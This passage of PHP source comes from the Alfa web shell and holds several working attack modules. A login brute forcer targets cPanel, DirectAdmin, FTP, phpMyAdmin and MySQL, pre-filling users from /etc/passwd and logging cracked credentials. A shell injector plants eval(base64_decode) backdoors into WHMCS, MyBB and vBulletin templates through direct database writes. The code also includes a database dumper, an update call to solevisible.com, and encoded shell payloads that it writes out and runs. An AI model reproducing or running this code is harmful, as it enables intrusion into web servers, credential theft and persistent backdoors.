1673 echo '</ul>';
1674}else{
1675echo('<center>mysqli_connect : Error!</center>');
1676}
1677}
1678echo('</div>');
1679alfafooter();
1680}
1681function alfaDumper(){
1682alfahead();
1683echo('<div class="header">');
1684AlfaNum(8,9,10);
1685echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
1686$table = array('td1' =>
1687 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1688 'td2' =>
1689 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1690 'td3' =>
1691 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1692 'td4' =>
1693 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1694 'td5' =>
1695 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
1696);
1697create_table($table);
1698echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
1699$username = ($_POST['alfa3']);
1700$password = ($_POST['alfa4']);
1701$dbname = ($_POST['alfa5']);
1702$dfile = ($_POST['alfa6']);
1703$host = ($_POST['alfa7']);
1704if(!empty($dbname)){
1705echo __pre();
1706$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
1707if(@mysqli_connect($host,$username,$password,$dbname)){
1708if(strlen(alfaEx("mysqldump"))>0){
1709alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
1710echo($msg);
1711}else{
1712__alert("Error...!");
1713}
1714}else{
1715echo('<center>mysqli_connect : Error!</center>');
1716}
1717}
1718echo('</div>');
1719alfafooter();
1720}
1721function Alfa_DirectAdmin_Cracker($info){
1722if(!$info['mysql'])
1723$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
1724else $url = $info['protocol'].$info['target'].'/phpmyadmin';
1725$curl = curl_init();
1726curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
1727curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1728curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
1729curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
1730curl_setopt($curl, CURLOPT_HEADER,0);
1731curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1732curl_setopt($curl, CURLOPT_URL,$url);
1733curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
1734if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
1735$result = @curl_exec($curl);
1736$curl_errno = curl_errno($curl);
1737$curl_error = curl_error($curl);
1738if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
1739elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
1740echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1741$info['target'] = $url;
1742CrackerResualt($info);
1743}
1744curl_close($curl);
1745}
1746function Alfa_CP_Cracker($info){
1747$url = $info['protocol'].$info['target'].':'.$info['port'];
1748$curl = curl_init();
1749curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
1750curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1751curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
1752curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
1753curl_setopt($curl, CURLOPT_HEADER,0);
1754curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
1755curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
1756curl_setopt($curl, CURLOPT_URL, $url);
1757$result = @curl_exec($curl);
1758$curl_errno = curl_errno($curl);
1759$curl_error = curl_error($curl);
1760if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
1761elseif(preg_match('/filemanager/i',$result)){
1762echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1763$info['target'] = $url;
1764CrackerResualt($info);
1765}
1766curl_close($curl);
1767}
1768function Alfa_FTP_Cracker($info){
1769$url = $info['protocol'].$info['target'];
1770$curl = curl_init();
1771curl_setopt($curl, CURLOPT_URL, $url);
1772curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1773curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1774curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
1775$result = @curl_exec($curl);
1776$curl_errno = curl_errno($curl);
1777$curl_error = curl_error($curl);
1778if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
1779elseif(preg_match('/(\d+):(\d+)/i',$result)){
1780echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1781$info['target'] = $url;
1782CrackerResualt($info);
1783}
1784curl_close($curl);
1785}
1786function Alfa_Mysql_Cracker($info){
1787if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
1788CrackerResualt($info);
1789echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1790}
1791}
1792function Alfa_FTPC($info){
1793if($con=@ftp_connect($info['target'],$info['port'])){
1794if($con){
1795$login=@ftp_login($con,$info['username'],$info['password']);
1796if($login){CrackerResualt($info);}}}
1797@ftp_close($con);
1798}
1799function CrackerResualt($info){
1800$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
1801$c = @fopen($info['fcrack'],'a+');
1802@fwrite($c, $res);
1803@fclose($c);
1804}
1805function Alfa_Call_Function_Cracker($method,$info){
1806switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
1807}
1808function alfaCrackers(){
1809alfahead();
1810AlfaNum(9,10);
1811echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
1812foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
1813echo '</select> Protocol: <select id="protocol" name="protocol">';
1814foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
1815echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
1816Port: <input id="port" type="text" name="port" value="2083">
1817<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
1818<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
1819  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
1820Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
1821<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
1822$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
1823$port = $_POST['alfa2'];
1824$usernames= $_POST['alfa3'];
1825$passwords = $_POST['alfa4'];
1826$fcrack = $_POST['alfa5'];
1827$cracking = $_POST['alfa6'];
1828$protocol = $_POST['alfa7'];
1829$loginpanel = $_POST['alfa8'];
1830$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
1831if($cracking=='start'){
1832echo __pre();
1833$exuser = explode("\n",$usernames);
1834$expw = explode("\n",$passwords);
1835foreach($exuser as $user){
1836foreach($expw as $pw){
1837$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
1838Alfa_Call_Function_Cracker($loginpanel,$array);
1839}
1840}
1841echo '<br><font color="red">Attack Finished...</font>';
1842}
1843echo '</div>';
1844alfafooter();
1845}
1846function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
1847function alfaShellInjectors(){
1848alfahead();
1849echo '<div class=header>';
1850AlfaNum(11);
1851echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
1852$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
1853if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
1854AlfaNum();
1855echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
1856$table = array('td1' =>
1857 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
1858 'td2' =>
1859 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1860 'td3' =>
1861 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1862 'td4' =>
1863 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1864 'td5' =>
1865 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
1866);
1867create_table($table);
1868echo $selector;
1869echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
1870if(isset($_POST['alfa6'])) {
1871$dbu = $_POST['alfa6'];
1872$dbn = $_POST['alfa7'];
1873$dbp = $_POST['alfa8'];
1874$dbh = $_POST['alfa9'];
1875$path = $_POST['alfa10'];
1876$method = $_POST['alfa4'];
1877$index = "{php}".ALFA_UPLOADER.";{/php}";
1878$newin = str_replace("'","\'",$index);
1879$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
1880if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
1881if(filter_var($path,FILTER_VALIDATE_URL)){
1882$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
1883$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
1884$soleGet = mysqli_fetch_assoc($soleSave);
1885$tempSave1 = $soleGet['message'];
1886$tempSave = str_replace("'","\'",$tempSave1);
1887mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
1888$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
1889$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
1890$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
1891$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
1892if(function_exists('curl_version') && $method == 'auto'){
1893$AlfaSole = new AlfaCURL(true);
1894$saveurl = $AlfaSole->Send($path."/pwreset.php");
1895$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
1896$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
1897$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
1898$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
1899__alert("shell injectet...");
1900$ff= 'http://'.$path."/solevisible.php";
1901output($ff);}else{
1902echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
1903}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
1904AlfaNum(1,2,3,5);
1905echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
1906";
1907$table = array('td1' =>
1908 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
1909 'td2' =>
1910 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
1911 'td3' =>
1912 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
1913 'td4' =>
1914 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1915 'td5' =>
1916 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
1917);
1918create_table($table);
1919echo $selector;
1920echo "<p><input type=submit value=' '></p></form></center></center>";
1921if(isset($_POST['alfa6'])) {
1922$dbu = $_POST['alfa6'];
1923$dbn = $_POST['alfa7'];
1924$dbp = $_POST['alfa8'];
1925$dbh = $_POST['alfa9'];
1926$prefix = $_POST['alfa10'];
1927$method = $_POST['alfa4'];
1928$shellCode = "{\${".ALFA_UPLOADER."}}";
1929$newinshell = str_replace("'","\'",$shellCode);
1930if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
1931$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
1932$inject = "select template from {$prefix}templates where title= 'calendar'";
1933$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
1934$GetTemp = mysqli_fetch_assoc($result);
1935$saveDate = $GetTemp['template'];
1936$repsave = str_replace($shellCode,"",$saveDate);
1937$repsave = str_replace("'","\'",$repsave);
1938$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
1939$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
1940$geturl = "select value from {$prefix}settings where name= 'bburl'";
1941$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
1942$rowb = mysqli_fetch_assoc($findurl);
1943$furl = $rowb['value'];
1944$realurl = parse_url($furl,PHP_URL_HOST);
1945$realpath = parse_url($furl,PHP_URL_PATH);
1946$res = false;
1947$AlfaCurl = new AlfaCURL();
1948if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
1949if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
1950@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
1951@fputs($fsock, "HOST: $realurl\r\n");
1952@fputs($fsock, "Connection: close\r\n\r\n");
1953$check = fgets($fsock);
1954if(preg_match("/200 OK/i",$check)){
1955$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
1956$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
1957@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
1958$AlfaCurl->Send($realurl.$realpath."/calendar.php");
1959$res = true;
1960}
1961if($res){
1962$ff = 'http://'.$realurl.$realpath."/solevisible.php";
1963output($ff);
1964}else{
1965$ff = 'http://'.$realurl.$realpath."/calendar.php";
1966$fff = 'http://'.$realurl.$realpath."/solevisible.php";
1967echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
1968}}}}
1969if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
1970AlfaNum(1,2,7,9,10);
1971echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
1972$table = array('td1' =>
1973 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
1974 'td2' =>
1975 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
1976 'td3' =>
1977 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
1978 'td4' =>
1979 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
1980 'td5' =>
1981 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
1982);
1983create_table($table);
1984echo $selector;
1985echo '<p><input type="submit" value=" " /></p></form></center>';
1986if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
1987$method = $_POST['alfa8'];
1988$faq_name = "faq";
1989$faq_file = "/faq.php";
1990$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
1991$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
1992$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
1993$recivedata = @mysqli_query($conn,$rec);
1994$getd = @mysqli_fetch_assoc($recivedata);
1995$savetoass = $getd['template'];
1996if(empty($savetoass)){
1997 $faq_name = "header";
1998 $faq_file = "/";
1999 $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
2000 $recivedata = @mysqli_query($conn,$rec);
2001 $getd = @mysqli_fetch_assoc($recivedata);
2002 $savetoass = $getd['template'];
2003 $code = ALFA_UPLOADER.";";
2004}
2005$code = str_replace("'","\'",$code);
2006$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
2007$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
2008$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
2009$getval = @mysqli_fetch_assoc($geturl);
2010$saveval = $getval['value'];
2011if($faq_name == "header"){
2012 if(substr($saveval, -5, 5) == "/core"){
2013 $saveval = substr($saveval, 0, -5);
2014 }
2015}
2016$realurl = parse_url($saveval,PHP_URL_HOST);
2017$realpath = parse_url($saveval,PHP_URL_PATH);
2018$res = false;
2019$AlfaCurl = new AlfaCURL();
2020if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
2021if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2022@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
2023@fputs($fsock, "HOST: $realurl\r\n");
2024@fputs($fsock, "Connection: close\r\n\r\n");
2025$check = fgets($fsock);
2026if(preg_match("/200 OK/i",$check)){
2027$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
2028$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2029$res = true;
2030}
2031@fclose($fsock);
2032}
2033}elseif(function_exists('curl_version') && $method == 'auto'){
2034$AlfaCurl->Send($realurl.$realpath.$faq_file);
2035$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
2036$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2037$res = true;
2038}
2039if($res){
2040$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2041output($ff);
2042}else{
2043$ff = 'http://'.$realurl.$realpath.$faq_file;
2044$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2045echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
2046echo '</div>';
2047alfafooter();
2048}
2049function alfacheckfiletype(){
2050 $path = $_POST['path'];
2051 $arg = $_POST['arg'];
2052 if(@is_file($path.'/'.$arg)){
2053 echo("file");
2054 }else{
2055 echo("dir");
2056 }
2057}
2058function alfacheckupdate(){
2059 if($GLOBALS["DB_NAME"]["cgi_api"]){
2060 if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){
2061 _alfa_cgicmd("whoami","perl",true);
2062 if(strlen(alfaEx("whoami",false,$cgi))>0){
2063 __alfa_set_cookie("alfa_canruncmd", "true");
2064 }
2065 }
2066 }
2067 if(function_exists("curl_version")){
2068 $update = new AlfaCURL();
2069 $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
2070 $json = @json_decode($json,true);
2071 $data = array();
2072 if($json){
2073 if(!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])){
2074 if($json["type"] == "update"){
2075 if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){
2076 @setcookie("alfa_checkupdate", "1", time()+86400);
2077 $data["content"] = '<div class="update-holder">'.$json["content"].'</div>';
2078 }
2079 }
2080 }
2081 if(isset($json["ads"]) && !empty($json["ads"])){
2082 $data["content"] .= $json["ads"];
2083 }
2084 if(isset($json["copyright"]) && !empty($json["copyright"])){
2085 $data["copyright"] = $json["copyright"];
2086 }
2087 if(isset($json["solevisible"]) && !empty($json["solevisible"])){
2088 $data["solevisible"] = $json["solevisible"];
2089 }
2090 if(isset($json["code_name"]) && !empty($json["code_name"])){
2091 $data["code_name"] = $json["code_name"];
2092 $data["version_number"] = __ALFA_VERSION__;
2093 }
2094 if(isset($json["market"]) && !empty($json["market"])){
2095 $data["market"] = $json["market"];
2096 }
2097 echo @json_encode($data);
2098 }
2099 }
2100}
2101function alfaWriteTocgiapi($name, $source){
2102 $temp = "";
2103 $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
2104 if(in_array($name, $not_api)){
2105 $temp = ALFA_TEMPDIR;
2106 if($temp){
2107 @chdir($temp);
2108 }
2109 }else{
2110 alfaCreateParentFolder();
2111 @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
2112 }
2113 @mkdir('alfacgiapi',0755);
2114 __write_file("alfacgiapi/".$name, __get_resource($source));
2115 @chmod("alfacgiapi/".$name, 0755);
2116 return $temp;
2117}
2118function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
2119function alfaupdateheader(){
2120 if(!isset($_COOKIE["updateheader_data"])){
2121 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
2122 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
2123 $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
2124 $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);
2125 if(@is_array(@json_decode($data,true))){
2126 __alfa_set_cookie("updateheader_data", $data);
2127 echo $data;
2128 }
2129 }else{
2130 echo $_COOKIE["updateheader_data"];
2131 }
2132}
2133function alfassiShell(){
2134alfahead();
2135echo '<div class=header>';
2136alfaCreateParentFolder();
2137@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
2138@mkdir('alfa_shtml',0755);
2139@chdir('alfa_shtml');
2140alfacgihtaccess('shtml');
2141$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0